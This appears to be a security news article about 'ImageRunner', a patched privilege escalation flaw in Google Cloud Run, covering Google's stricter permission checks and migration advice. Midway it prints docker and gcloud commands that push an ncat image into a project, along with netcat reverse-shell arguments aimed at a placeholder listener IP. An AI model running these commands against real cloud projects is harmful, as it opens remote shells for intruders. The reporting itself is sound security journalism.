A critical privilege escalation vulnerability in Google Cloud Platform’s (GCP) Cloud Run service, dubbed “ImageRunner,” has been uncovered and subsequently patched.
Discovered by Tenable Research, this flaw highlighted significant risks associated with interdependencies in cloud services, allowing attackers to exploit permissions to access private container images stored in Google Artifact Registry or the now-deprecated Container Registry.
The Core of ImageRunner
Cloud Run is a serverless platform designed for running containerized applications. It retrieves container images from repositories like Artifact Registry, a next-generation solution that replaced Container Registry as of March 18, 2025.
Artifact Registry supports multiple artifact types and offers fine-grained access control through Identity and Access Management (IAM) roles such as roles/artifactregistry.reader.
The vulnerability centered on the interaction between Cloud Run’s service agent and these repositories. Service agents—specialized accounts managed by Google—are responsible for pulling container images during application deployment.
However, Tenable discovered that an attacker with specific permissions (run.services.update and iam.serviceAccounts.actAs) could exploit this process to access private images without direct registry permissions.
Exploitation Mechanism
An attacker could modify an existing Cloud Run service to create a new deployment revision.
By specifying any private container image within the same project, they could bypass image-specific permissions.
This allowed malicious actors to:
- Inspect private container images for sensitive data or secrets.
- Inject malicious instructions into deployment configurations.
- Execute unauthorized code or exfiltrate critical data.
For instance, an attacker could use the following commands to hijack a private image:
docker pull raesene/ncat
gcloud auth login
gcloud auth configure-docker
docker tag raesene/ncat gcr.io/{project-name}/ncat:latest
docker push gcr.io/{project-name}/ncat:latestBy updating a Cloud Run service revision to deploy this image, they could execute malicious payloads such as reverse shells using arguments like:
{Your nc listener IP}, {Port}, -e /bin/bashThis demonstrated how weak permission controls could lead to severe security breaches.
The Jenga® Concept
Tenable referred to ImageRunner as an example of the “Jenga®” concept—a metaphor for how cloud providers build services atop one another.
If one layer is compromised, it can cascade vulnerabilities across dependent services. This highlights the importance of robust security measures at every layer of cloud infrastructure.
Google’s Response and Fixes
In response to ImageRunner, Google implemented stricter IAM checks for Cloud Run deployments.
As of January 28, 2025, principals (users or service accounts) deploying Cloud Run resources must have explicit read permissions for the referenced container images.
This ensures that even if an attacker gains run.services.update and iam.serviceAccounts.actAs permissions, they cannot access private images without additional roles like Artifact Registry Reader.
Moreover, Google issued notifications to affected users and rolled out updates to enhance overall security.
This fix underscores the critical need for organizations to regularly review IAM configurations and adhere to the principle of least privilege.
Transition from Container Registry to Artifact Registry
The vulnerability also underscores the benefits of migrating from the Container Registry to the Artifact Registry.
The latter offers enhanced features such as:
- Support for multiple artifact formats (e.g., Maven packages, Node.js modules).
- Regional repositories for better control.
- Fine-grained IAM roles for improved security.
Key Takeaways
- Regularly Audit Permissions: Ensure that only essential roles are assigned to users or service accounts.
- Adopt Next-Generation Tools: Transitioning to Artifact Registry can provide better security and flexibility.
- Monitor Dependencies: Understand how interconnected services might introduce risks.
ImageRunner serves as a reminder that even minor permission oversights can lead to significant vulnerabilities in cloud environments.
Organizations must stay proactive in securing their cloud infrastructure against evolving threats.
Also Read:
%20(1).webp?w=1200&resize=1200,0&ssl=1&description=A critical privilege escalation vulnerability in Google Cloud Platform’s (GCP) Cloud Run service, dubbed "ImageRunner," has been uncovered and subsequently patched.){kind=link}